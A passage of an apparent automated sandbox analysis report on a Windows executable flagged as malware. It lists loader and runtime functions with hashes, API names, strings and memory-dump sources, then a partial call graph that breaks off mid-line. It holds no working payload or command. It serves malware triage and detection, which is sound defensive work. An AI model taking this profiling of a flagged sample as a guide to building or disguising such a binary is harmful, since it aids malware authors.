                                                                                                                                                                                                                                    • Instruction ID: 8165432c39fffa61294ead53af646874ba316c37300f5e9d178a84ded1d9a76b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D51C53250934286DB33AB29904426AF790FB66B84F988135DB4E87F8DDFBCE450C714
                                                                                                                                                                                                                                    Function 00007FF7B2B6EED8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                                                    • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                    • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                    • Instruction ID: 021223d050dcdf596b6cf7bacd114ef25950b317e2b118e1c32a31a0cedf2373
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9761C532909BC185E722AF19E4407ABF7A0FBA5784F444225EB9D43B59EFBCD091CB14
                                                                                                                                                                                                                                    Function 00007FF7B2B62810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Message
                                                                                                                                                                                                                                    • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                    • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                    • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                    • Instruction ID: dfdf35c94a1499a2b4231167396f838d9f3b4e44d3aa28ff64e4f2337603bf4d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4921E122709B4181E712AB28B8457ABB360EB99780F800136EF8D9771EFE7CD605C710
                                                                                                                                                                                                                                    Function 00007FF7B2B7C5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2718003287-0
                                                                                                                                                                                                                                    • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                    • Instruction ID: f47c6dfe5457a1977ca536a7ec57ec50a504dd4a4b8f41f7e1890882c08b3106
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1D11672B09A4089E752EF6DC4402AD77B1FB66798B804239DF5E97B99EE78D006C310
                                                                                                                                                                                                                                    Function 00007FF7B2B620C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1956198572-0
                                                                                                                                                                                                                                    • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                    • Instruction ID: 9c845aa00cd284ee15acc40bedeae4b2c7b9aeae3dbdd19f56e33b9c4a9f853a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE110621A0D14282F647A76DE54927BE252EBAA780FC84030DB4D87B9EEDBDD4C0C214
                                                                                                                                                                                                                                    Function 00007FF7B2B85B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID: ?
                                                                                                                                                                                                                                    • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                    • Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                    • Instruction ID: f933a8e535a0e8425cdd95c7e598108658c05b899318956af60706f70ccc1b6a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14415D12A1A24241F7626B1DD40577BE690EBA27A4F944238EF4C0AADDFFBCD441CB10
                                                                                                                                                                                                                                    Function 00007FF7B2B79014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B2B79046
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B7A948: RtlFreeHeap.NTDLL(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A95E
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B7A948: GetLastError.KERNEL32(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A968
                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7B2B6CBA5), ref: 00007FF7B2B79064
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe, xrefs: 00007FF7B2B79052
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                    • API String ID: 3580290477-3624693095
                                                                                                                                                                                                                                    • Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                    • Instruction ID: 75333a7cd189500cb1f0fb36940525c2acb25f483965cea86c4d71d1ea5e9a57
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F541A132A0AA0285E757FF2D94400BEB3A4EB567D0B954035EB4D47BA9EE7CE491C320
                                                                                                                                                                                                                                    Function 00007FF7B2B7CC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                    • String ID: U
                                                                                                                                                                                                                                    • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                    • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                    • Instruction ID: 53016007c94c5f92feb0fdf920e9baac73490a641f8e52ca4767f7eae9c23db6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA41B432719A4181EB61AF29E4443BAA760FBA9784F944135EF4D877A8FF7CD401C750
                                                                                                                                                                                                                                    Function 00007FF7B2B7F5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentDirectory
                                                                                                                                                                                                                                    • String ID: :
                                                                                                                                                                                                                                    • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                    • Opcode ID: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                                    • Instruction ID: 5dc69d1594f78e5476cd8a2e3690d6d0e25bc9fca476ecdc8cf057dd842afb2e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 21212562A0928181EB22BB1CD04426FB3B1FBA5B44FC54039DB4D432ACEFBCD944C760
                                                                                                                                                                                                                                    Function 00007FF7B2B6FD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                    • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                    • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                    • Instruction ID: ff432e68e2524181438430a90ae6f6fad9f07540786ada7cf2f339e97a492e80
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58114C32609B8182EB229F29E40025AB7E4FB99B88F584234DB8D47768EF7CD551CB00
                                                                                                                                                                                                                                    Function 00007FF7B2B8073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID: :
                                                                                                                                                                                                                                    • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                    • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                    • Instruction ID: e24e7482a3a2e25d9e60ee98e9af8bb884b4093bc9117a16fcb0c71b8b16062f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D601882591D20285FB26BF68946627FA3A0EF66784FC00439D74D4A699FFACD504CB24

                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                    Execution Coverage:1.6%
                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                    Signature Coverage:1.2%
                                                                                                                                                                                                                                    Total number of Nodes:664
                                                                                                                                                                                                                                    Total number of Limit Nodes:10
                                                                                                                                                                                                                                    execution_graph 77280 7ff7b2b6cc3c 77301 7ff7b2b6ce0c 77280->77301 77283 7ff7b2b6cd88 77452 7ff7b2b6d12c 7 API calls 2 library calls 77283->77452 77284 7ff7b2b6cc58 __scrt_acquire_startup_lock 77286 7ff7b2b6cd92 77284->77286 77292 7ff7b2b6cc76 __scrt_release_startup_lock 77284->77292 77453 7ff7b2b6d12c 7 API calls 2 library calls 77286->77453 77288 7ff7b2b6cc9b 77289 7ff7b2b6cd9d __CxxCallCatchBlock 77290 7ff7b2b6cd21 77307 7ff7b2b6d274 77290->77307 77292->77288 77292->77290 77449 7ff7b2b79b2c 45 API calls 77292->77449 77293 7ff7b2b6cd26 77310 7ff7b2b61000 77293->77310 77299 7ff7b2b6cd49 77299->77289 77451 7ff7b2b6cf90 7 API calls 77299->77451 77300 7ff7b2b6cd60 77300->77288 77302 7ff7b2b6ce14 77301->77302 77303 7ff7b2b6ce20 __scrt_dllmain_crt_thread_attach 77302->77303 77304 7ff7b2b6cc50 77303->77304 77305 7ff7b2b6ce2d 77303->77305 77304->77283 77304->77284 77305->77304 77454 7ff7b2b6d888 7 API calls 2 library calls 77305->77454 77455 7ff7b2b8a4d0 77307->77455 77311 7ff7b2b61009 77310->77311 77457 7ff7b2b75484 77311->77457 77313 7ff7b2b637fb 77464 7ff7b2b636b0 77313->77464 77320 7ff7b2b6383c 77567 7ff7b2b61c80 77320->77567 77321 7ff7b2b6391b 77572 7ff7b2b645c0 77321->77572 77325 7ff7b2b6385b 77536 7ff7b2b68830 77325->77536 77327 7ff7b2b6396a 77595 7ff7b2b62710 54 API calls _log10_special 77327->77595 77328 7ff7b2b6388e 77338 7ff7b2b638bb __std_exception_destroy 77328->77338 77571 7ff7b2b689a0 40 API calls __std_exception_destroy 77328->77571 77331 7ff7b2b6395d 77332 7ff7b2b63984 77331->77332 77333 7ff7b2b63962 77331->77333 77334 7ff7b2b61c80 49 API calls 77332->77334 77591 7ff7b2b7004c 77333->77591 77337 7ff7b2b639a3 77334->77337 77342 7ff7b2b61950 115 API calls 77337->77342 77339 7ff7b2b68830 14 API calls 77338->77339 77348 7ff7b2b638de __std_exception_destroy 77338->77348 77339->77348 77341 7ff7b2b63a0b 77598 7ff7b2b689a0 40 API calls __std_exception_destroy 77341->77598 77344 7ff7b2b639ce 77342->77344 77344->77325 77347 7ff7b2b639de 77344->77347 77345 7ff7b2b63a17 77599 7ff7b2b689a0 40 API calls __std_exception_destroy 77345->77599 77596 7ff7b2b62710 54 API calls _log10_special 77347->77596 77352 7ff7b2b6390e __std_exception_destroy 77348->77352 77597 7ff7b2b68940 40 API calls __std_exception_destroy 77348->77597 77349 7ff7b2b63a23 77600 7ff7b2b689a0 40 API calls __std_exception_destroy 77349->77600 77353 7ff7b2b68830 14 API calls 77352->77353 77354 7ff7b2b63a3b 77353->77354 77355 7ff7b2b63b2f 77354->77355 77356 7ff7b2b63a60 __std_exception_destroy 77354->77356 77602 7ff7b2b62710 54 API calls _log10_special 77355->77602 77363 7ff7b2b63aab 77356->77363 77601 7ff7b2b68940 40 API calls __std_exception_destroy 77356->77601 77359 7ff7b2b68830 14 API calls 77360 7ff7b2b63bf4 __std_exception_destroy 77359->77360 77361 7ff7b2b63c46 77360->77361 77362 7ff7b2b63d41 77360->77362 77364 7ff7b2b63cd4 77361->77364 77365 7ff7b2b63c50 77361->77365 77616 7ff7b2b644e0 49 API calls 77362->77616 77363->77359 77367 7ff7b2b68830 14 API calls 77364->77367 77603 7ff7b2b690e0 59 API calls _log10_special 77365->77603 77373 7ff7b2b63ce0 77367->77373 77369 7ff7b2b63d4f 77371 7ff7b2b63d65 77369->77371 77372 7ff7b2b63d71 77369->77372 77370 7ff7b2b63c55 77376 7ff7b2b63c61 77370->77376 77377 7ff7b2b63cb3 77370->77377 77617 7ff7b2b64630 77371->77617 77375 7ff7b2b61c80 49 API calls 77372->77375 77373->77376 77378 7ff7b2b63ced 77373->77378 77388 7ff7b2b63d2b __std_exception_destroy 77375->77388 77604 7ff7b2b62710 54 API calls _log10_special 77376->77604 77614 7ff7b2b68660 86 API calls 2 library calls 77377->77614 77380 7ff7b2b61c80 49 API calls 77378->77380 77384 7ff7b2b63d0b 77380->77384 77382 7ff7b2b63dc4 77549 7ff7b2b69390 77382->77549 77383 7ff7b2b63cbb 77386 7ff7b2b63cc8 77383->77386 77387 7ff7b2b63cbf 77383->77387 77384->77388 77389 7ff7b2b63d12 77384->77389 77386->77388 77387->77376 77388->77382 77390 7ff7b2b63da7 SetDllDirectoryW LoadLibraryExW 77388->77390 77615 7ff7b2b62710 54 API calls _log10_special 77389->77615 77390->77382 77391 7ff7b2b63dd7 SetDllDirectoryW 77395 7ff7b2b63e0a 77391->77395 77437 7ff7b2b63e5a 77391->77437 77394 7ff7b2b63808 __std_exception_destroy 77605 7ff7b2b6c550 77394->77605 77397 7ff7b2b68830 14 API calls 77395->77397 77396 7ff7b2b64008 77399 7ff7b2b64035 77396->77399 77400 7ff7b2b64012 PostMessageW GetMessageW 77396->77400 77404 7ff7b2b63e16 __std_exception_destroy 77397->77404 77398 7ff7b2b63f1b 77628 7ff7b2b633c0 121 API calls 2 library calls 77398->77628 77554 7ff7b2b63360 77399->77554 77400->77399 77402 7ff7b2b63f23 77402->77394 77405 7ff7b2b63f2b 77402->77405 77407 7ff7b2b63ef2 77404->77407 77411 7ff7b2b63e4e 77404->77411 77629 7ff7b2b690c0 LocalFree 77405->77629 77627 7ff7b2b68940 40 API calls __std_exception_destroy 77407->77627 77411->77437 77620 7ff7b2b66dc0 54 API calls _get_daylight 77411->77620 77419 7ff7b2b6405b 77422 7ff7b2b63e6c 77621 7ff7b2b67340 117 API calls 2 library calls 77422->77621 77425 7ff7b2b63e81 77428 7ff7b2b63ea2 77425->77428 77440 7ff7b2b63e85 77425->77440 77622 7ff7b2b66e00 120 API calls _log10_special 77425->77622 77428->77440 77623 7ff7b2b671b0 125 API calls 77428->77623 77432 7ff7b2b63ee0 77626 7ff7b2b66fc0 FreeLibrary 77432->77626 77433 7ff7b2b63eb7 77433->77440 77624 7ff7b2b674f0 55 API calls 77433->77624 77437->77396 77437->77398 77440->77437 77625 7ff7b2b62a50 54 API calls _log10_special 77440->77625 77449->77290 77450 7ff7b2b6d2b8 GetModuleHandleW 77450->77299 77451->77300 77452->77286 77453->77289 77454->77304 77456 7ff7b2b6d28b GetStartupInfoW 77455->77456 77456->77293 77460 7ff7b2b7f480 77457->77460 77458 7ff7b2b7f4d3 77631 7ff7b2b7a814 37 API calls 2 library calls 77458->77631 77460->77458 77461 